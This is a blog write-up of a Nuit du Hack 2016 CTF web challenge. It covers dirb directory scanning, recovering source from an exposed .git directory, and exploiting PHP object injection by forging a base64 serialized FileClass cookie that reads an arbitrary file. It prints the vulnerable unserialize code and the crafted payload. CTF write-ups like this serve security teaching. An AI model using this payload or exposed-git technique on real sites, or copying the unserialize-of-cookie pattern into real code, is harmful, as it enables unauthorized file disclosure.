The weekend of 04\/01\/2016 is pre-qualification for the Nuit du Hack 2016<\/a><\/strong>\u00a0as a Jeopardy CTF<\/strong>. Having had the opportunity and the time to participate with some colleagues and friends, here\u2019s a write-up resolution of the challenges which we could participate.<\/p>\n By visiting the challenge page “http:\/\/findmeimfamous.quals.nuitduhack.com”, we visualized a form requesting a “login” and “age”. No check on the format of the input data.<\/p>\n First page<\/p><\/div>\n After entering a login and arbitrary age, a new page asks us to identify:<\/p>\n Identification page<\/p><\/div>\n Upon completion of identification, we arrive on the page “result.php” that shows us the welcome message with information related to our age:<\/p>\n result.php<\/p><\/div>\n We observe the exchanges made during the various requests and we note that the destination page “result.php” a “cook” cookie is included in the request.<\/p>\n Legitimate cookie<\/p><\/div>\n The value of “cook” can be URL-decoded and base64-decoded to give:<\/p>\n This cookie thus contains the image of our “User” object \u00a0serialized and encoded in base64. On reading this serialized format is deduced:<\/p>\n Looking at the source code of the page, one notices the presence of the “<meta>” indicating the author:<\/p>\n Author<\/p><\/div>\n Some investigations take us on tympanus<\/a>, to download an\u00a0HTML \/ CSS package of this model of login \/ registration module. But\u00a0the package contains no such server side code such as those in place for the challenge (index.php, result.php, etc.).<\/p>\n The analysis was continued by launching a directories guessing on target:<\/p>\n Interesting! A “git” directory browsable is at the root of server:<\/p>\n git directory listable<\/p><\/div>\n It seems that this directory called “git”, corresponds to a technical versioning directory of the eponymous tool named “.git” within a repos.<\/p>\n I also want to refer you to the excellent article InternetWache<\/a>, which details the dangers and presents various tools<\/a> to retrieve the full source code of a website from information leaks from his “.git” directory exposed; this directory can be\u00a0browsable (Index Of) or not!<\/p>\n We can\u00a0continue through the recursive copy of the entire contents of this directory:<\/p>\n We rename the configuration directory and clean some residual files due to the Index of:<\/p>\n So we have the technical repertoire “.git” of the challenge, without source code and project files themselves. Check the integrity and the last events of the deposits:<\/p>\n Interesting … Reinitialize\u00a0deposit and the original source code!<\/p>\n We can now see the challenge’s files:<\/p>\n A particular file name intrigues us:<\/p>\n This file\u00a0must have the “flag” in production. Check the “result.php”:<\/p>\n It is this page that retrieve our cookie value “cook” after the base64 decoding, then unserializes\u00a0the object content. No typing checks of the object class or cast is performed. The final vulnerability\u00a0can be seen…<\/p>\n Note also that once the object “$obj” is regenerated a “echo $obj;” is realised, which has the effect of automatically call the magic method “__toString ()” (if present) in the object. Check if this method is present in our object “User” defined in “userclass.php”:<\/p>\n Yes! The assumptions on the class definition format “User” issued at the beginning by reading the serialized cookie is confirmed. A method “__toString ()” is present and it is that which generates the message “Hello ycam you-have xxx years old.<\/em>” shown above.<\/p>\n But there remains an unused file so far among the sources: fileclasse.php:<\/p>\n This simple class, never called \/ instantiated in the project, has an almost similar structure to the User class; but\u00a0only one attribute is defined (the name of the file whose contents will be read through\u00a0the call of the __toString () method). Yes, this class also has its __toString () method defined! The idea now will be to regenerate a cookie of an object “FileClass” rather than “User” serialized, to call the __toString () method to read the contents of “ufhkistgfj.php” file.<\/p>\n Changing the serialized object and its equivalent in base64:<\/p>\n Injecting the cookie in the request to “result.php”, our “FileClass” class with attribute “$filename = ‘ufhkistgfj.php” will be\u00a0unserialized and its __toString () method will becalled:<\/p>\n FileClass cookie encoded<\/p><\/div>\n Results:<\/p>\n ufhkistgfj.php<\/p><\/div>\n Flag :\u00a0NDH[bsnae6PcNyrWZ82Q8v6pfJ6C6HG433L6]<\/strong><\/p>\n Greeting to\u00a0nj8<\/a>, St0rn<\/a>, Emiya<\/a>, Mido, downg(r)ade,\u00a0Ryuk@n and\u00a0rikelm, \ud83d\ude09\u00a0\/\/ Gr3etZ<\/p>\n Sources & ressources :<\/strong><\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" Write-up of the challenge \u201cWebApp – Find Me I’m Famous\u201d of Nuit du\u00a0Hack 2016 CTF qualifications. The weekend of 04\/01\/2016 […]<\/p>\n","protected":false},"author":1337,"featured_media":1963,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[524,523,526,527,452,14],"tags":[462,458,456,461,455,460,463,457,459],"class_list":["post-1946","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","category-events","category-ndh","category-ndh2k16","category-php-object-injection-vuln-exploit-poc","category-vuln-exploit-poc","tag-__tostring","tag-find-me-im-famous","tag-joepardy","tag-php-object-injection","tag-qualifications","tag-serialize","tag-unserialize","tag-webapp","tag-write-up"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1946","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=1946"}],"version-history":[{"count":11,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1946\/revisions"}],"predecessor-version":[{"id":1988,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/1946\/revisions\/1988"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1963"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=1946"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=1946"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=1946"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n
![\"First](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/01-300x218.png\")
<\/a>![\"Identification](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/02-300x188.png\")
<\/a>![\"result.php\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/03-300x78.png\")
<\/a>![\"Legitimate](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/05-300x168.png\")
<\/a>Cookie=PHPSESSID=kdf7p64lmaqpkp9nufqbi1gqn0; cook=Tzo0OiJVc2VyIjoyOntzOjM6ImFnZSI7czozOiJ4eHgiO3M6NDoibmFtZSI7czo0OiJ5Y2FtIjt9<\/pre>\n
O:4:\"User\":2:{s:3:\"age\";s:3:\"xxx\";s:4:\"name\";s:4:\"ycam\";}<\/pre>\n\n
\n
![\"Author\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/11-300x84.png\")
<\/a>dirb http:\/\/findmeimfamous.quals.nuitduhack.com \/usr\/share\/wordlists\/dirb\/common.txt\r\n-----------------\r\nDIRB v2.22\r\nBy The Dark Raver\r\n-----------------\r\nSTART_TIME: Sat Apr 2 20:13:53 2016\r\nURL_BASE: http:\/\/findmeimfamous.quals.nuitduhack.com\/\r\nWORDLIST_FILES: \/usr\/share\/wordlists\/dirb\/common.txt\r\n-----------------\r\nGENERATED WORDS: 4612\r\n---- Scanning URL: http:\/\/findmeimfamous.quals.nuitduhack.com\/ ----\r\n+ http:\/\/findmeimfamous.quals.nuitduhack.com\/cgi-bin\/ (CODE:403|SIZE:217)\r\n==> DIRECTORY: http:\/\/findmeimfamous.quals.nuitduhack.com\/css\/\r\n==> DIRECTORY: http:\/\/findmeimfamous.quals.nuitduhack.com\/git\/\r\n==> DIRECTORY: http:\/\/findmeimfamous.quals.nuitduhack.com\/images\/\r\n+ http:\/\/findmeimfamous.quals.nuitduhack.com\/index.php (CODE:200|SIZE:2382)\r\n+ http:\/\/findmeimfamous.quals.nuitduhack.com\/server-status (CODE:403|SIZE:222)\r\n---- Entering directory: http:\/\/findmeimfamous.quals.nuitduhack.com\/css\/ ----\r\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\r\n (Use mode '-w' if you want to scan it anyway)\r\n---- Entering directory: http:\/\/findmeimfamous.quals.nuitduhack.com\/git\/ ----\r\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\r\n (Use mode '-w' if you want to scan it anyway)\r\n---- Entering directory: http:\/\/findmeimfamous.quals.nuitduhack.com\/images\/ ----\r\n(!) WARNING: Directory IS LISTABLE. No need to scan it.\r\n (Use mode '-w' if you want to scan it anyway)\r\n-----------------\r\nEND_TIME: Sat Apr 2 20:18:05 2016\r\nDOWNLOADED: 4612 - FOUND: 3<\/pre>\n
![\"git](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/04-220x300.png\")
<\/a>wget --mirror -I git http:\/\/findmeimfamous.quals.nuitduhack.com\/git\/<\/pre>\n
mv git .git\r\nrm .git\/index.html*\r\nrm .git\/refs\/index.html*<\/pre>\n
# git status\r\nSur la branche master\r\nVotre branche est \u00e0 jour avec 'origin\/master'.\r\nModifications qui ne seront pas valid\u00e9es :\r\n (utilisez \"git add\/rm <fichier>...\" pour mettre \u00e0 jour ce qui sera valid\u00e9)\r\n (utilisez \"git checkout -- <fichier>...\" pour annuler les modifications dans la copie de travail)\r\nsupprim\u00e9\u00a0: README.md\r\n supprim\u00e9\u00a0: app\/.buildpath\r\n supprim\u00e9\u00a0: app\/.project\r\n supprim\u00e9\u00a0: app\/.settings\/org.eclipse.php.core.prefs\r\n supprim\u00e9\u00a0: app\/.settings\/org.eclipse.wst.common.project.facet.core.xml\r\n supprim\u00e9\u00a0: app\/config.php\r\n supprim\u00e9\u00a0: app\/css\/animate-custom.css\r\n supprim\u00e9\u00a0: app\/css\/demo.css\r\n supprim\u00e9\u00a0: app\/css\/fonts\/BebasNeue-webfont.eot\r\n supprim\u00e9\u00a0: app\/css\/fonts\/BebasNeue-webfont.svg\r\n supprim\u00e9\u00a0: app\/css\/fonts\/BebasNeue-webfont.ttf\r\n supprim\u00e9\u00a0: app\/css\/fonts\/BebasNeue-webfont.woff\r\n supprim\u00e9\u00a0: app\/css\/fonts\/Dharma Type Font License.txt\r\n supprim\u00e9\u00a0: app\/css\/fonts\/fontomas-webfont.eot\r\n supprim\u00e9\u00a0: app\/css\/fonts\/fontomas-webfont.svg\r\n supprim\u00e9\u00a0: app\/css\/fonts\/fontomas-webfont.ttf\r\n supprim\u00e9\u00a0: app\/css\/fonts\/fontomas-webfont.woff\r\n supprim\u00e9\u00a0: app\/css\/fonts\/franchise-bold-webfont.eot\r\n supprim\u00e9\u00a0: app\/css\/fonts\/franchise-bold-webfont.svg\r\n supprim\u00e9\u00a0: app\/css\/fonts\/franchise-bold-webfont.ttf\r\n supprim\u00e9\u00a0: app\/css\/fonts\/franchise-bold-webfont.woff\r\n supprim\u00e9\u00a0: app\/css\/style.css\r\n supprim\u00e9\u00a0: app\/css\/style2.css\r\n supprim\u00e9\u00a0: app\/css\/style3.css\r\n supprim\u00e9\u00a0: app\/fileclasse.php\r\n supprim\u00e9\u00a0: app\/images\/ImageAttribution.txt\r\n supprim\u00e9\u00a0: app\/images\/bg.jpg\r\n supprim\u00e9\u00a0: app\/index.php\r\n supprim\u00e9\u00a0: app\/result.php\r\n supprim\u00e9\u00a0: app\/ufhkistgfj.php\r\n supprim\u00e9\u00a0: app\/userclass.php\r\naucune modification n'a \u00e9t\u00e9 ajout\u00e9e \u00e0 la validation (utilisez \"git add\" ou \"git commit -a\")<\/pre>\n
# git checkout -- .\r\n# ll app\/\r\ntotal 56\r\ndrwxr-xr-x 5 root root 4096 avril 2 20:27 .\r\ndrwxr-xr-x 4 root root 4096 avril 2 20:27 ..\r\n-rw-r--r-- 1 root root 174 avril 2 20:27 .buildpath\r\n-rw-r--r-- 1 root root 22 avril 2 20:27 config.php\r\ndrwxr-xr-x 3 root root 4096 avril 2 20:27 css\r\n-rw-r--r-- 1 root root 159 avril 2 20:27 fileclasse.php\r\ndrwxr-xr-x 2 root root 4096 avril 2 20:27 images\r\n-rw-r--r-- 1 root root 5093 avril 2 20:27 index.php\r\n-rw-r--r-- 1 root root 725 avril 2 20:27 .project\r\n-rw-r--r-- 1 root root 2012 avril 2 20:27 result.php\r\ndrwxr-xr-x 2 root root 4096 avril 2 20:27 .settings\r\n-rw-r--r-- 1 root root 26 avril 2 20:27 ufhkistgfj.php\r\n-rw-r--r-- 1 root root 266 avril 2 20:27 userclass.php<\/pre>\n
# cat config.php\r\nNOT here ...<\/pre>\n
# cat ufhkistgfj.php\r\n#I will add the flag here<\/pre>\n<\/div>\n
# cat result.php\r\n<?php\r\ninclude('.\/userclass.php');\r\ninclude('.\/fileclasse.php');\r\nsession_start();\r\nif (isset($_COOKIE[\"cook\"]) && !empty($_COOKIE[\"cook\"])){\r\n $obj = unserialize(base64_decode($_COOKIE['cook']));\r\nob_start();\r\n echo $obj;\r\n$ff = $obj->name;\r\n }\r\n if(isset($_POST[\"name_2\"]) && !empty($_POST['name_2']) && $ff==$_POST['name_2'])\r\n {\r\n?>\r\n<!DOCTYPE html>\r\n<!--[if lt IE 7 ]> <html lang=\"en\" class=\"no-js ie6 lt8\"> <![endif]-->\r\n<!--[if IE 7 ]> <html lang=\"en\" class=\"no-js ie7 lt8\"> <![endif]-->\r\n<!--[if IE 8 ]> <html lang=\"en\" class=\"no-js ie8 lt8\"> <![endif]-->\r\n<!--[if IE 9 ]> <html lang=\"en\" class=\"no-js ie9\"> <![endif]-->\r\n<!--[if (gt IE 9)|!(IE)]><!--> <html lang=\"en\" class=\"no-js\"> <!--<![endif]-->\r\n <head>\r\n <meta charset=\"UTF-8\" \/>\r\n <!-- <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> -->\r\n <title>index<\/title>\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta name=\"description\" content=\"Login and Registration Form with HTML5 and CSS3\" \/>\r\n <meta name=\"keywords\" content=\"html5, css3, form, switch, animation, :target, pseudo-class\" \/>\r\n <meta name=\"author\" content=\"Codrops\" \/>\r\n <link rel=\"shortcut icon\" href=\"..\/favicon.ico\">\r\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"css\/demo.css\" \/>\r\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"css\/style.css\" \/>\r\n <link rel=\"stylesheet\" type=\"text\/css\" href=\"css\/animate-custom.css\" \/>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n<section>\r\n <div id=\"container_demo\" >\r\n <div id=\"wrapper\">\r\n <div id=\"login\" class=\"animate form\">\r\n<h1>TEST<\/h1> <br\/><p> TEXT<\/p>\r\n<\/div>\r\n <\/div>\r\n <\/div>\r\n <\/section>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n<?php\r\n}\r\n else {\r\n header(\"location: index.php\");\r\n}\r\n?><\/pre>\n# cat userclass.php\r\n<?php\r\nclass User\r\n{\r\n \/\/ Class data\r\npublic $age = 0;\r\n public $name = '';\r\n\/\/ Allow object to be used as a String\r\npublic function __toString()\r\n {\r\n return 'Hello ' . $this->name . ' you have ' . $this->age . ' years old. <br \/>';\r\n }\r\n}\r\n?><\/pre>\n# cat fileclasse.php\r\n<?php\r\nclass FileClass\r\n{\r\npublic $filename = 'error.log';\r\npublic function __toString()\r\n {\r\n return file_get_contents($this->filename);\r\n }\r\n}<\/pre>\nO:9:\"FileClass\":1:{s:8:\"filename\";s:14:\"ufhkistgfj.php\";}\r\nTzo5OiJGaWxlQ2xhc3MiOjE6e3M6ODoiZmlsZW5hbWUiO3M6MTQ6InVmaGtpc3RnZmoucGhwIjt9<\/pre>\n![\"FileClass](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/06-300x168.png\")
<\/a>![\"ufhkistgfj.php\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/07-300x168.png\")
<\/a>\n